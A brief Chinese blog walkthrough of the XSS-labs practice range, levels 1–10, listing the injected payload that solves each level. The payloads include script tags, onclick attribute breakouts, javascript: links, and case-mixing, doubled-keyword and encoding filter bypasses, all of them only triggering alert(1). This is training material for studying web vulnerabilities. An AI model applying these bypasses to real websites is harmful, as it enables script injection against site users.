目录
靶场下载地址:
- 百度网盘链接:https://pan.baidu.com/s/1CvkdKvVSrg5fBm7jW4WKXg?pwd=a648 提取码:a648
- 迅雷链接:https://pan.xunlei.com/s/VNzC15Qh3oWv5ZNc7G8utw-HA1?pwd=rnnb#
靶场搭建:https://mp.csdn.net/mp_blog/creation/editor/139561853
Level-1
?name=<script>alert()</script>
Level-2
?keyword="><script>alert(1)</script>
"onclick="alert(1)
Level-3
'onclick='alert(1)
' onclick ='javascript:alert(1)'//
'onclick=javascript:alert() '
点搜索之后再点击搜索框就过关了
Level-4
尝试之后发现和第3关一样
"onclick="alert(1)
Level-5
"><a href="javascript:alert(1)">aa</a>
点击aa
Level-6
"Onclick="alert(1)
使用大小写绕过,搜索之后点击搜索框
Level-7
"oonnclick="alert(1)
使用双写绕过,搜索之后点击搜索框
Level-8
文本框输入的内容传到这个友情链接里面,并且还作为href参数,使用伪协议啊,试了发现script被替换,然后编码
javascript:alert(1)
添加友情链接——点击友情链接
Level-9
javascript:alert(1)/*http://*/
Level-10
t_link=aaaaaa&t_sort=aaaaaaaaa" type="text" onclick="alert(1)&t_history=aaaaaaa
点击输入框
标签:XSS,Level,关速通,alert,labs,点击,&#,onclick,97 From: https://blog.csdn.net/weixin_68416970/article/details/140478884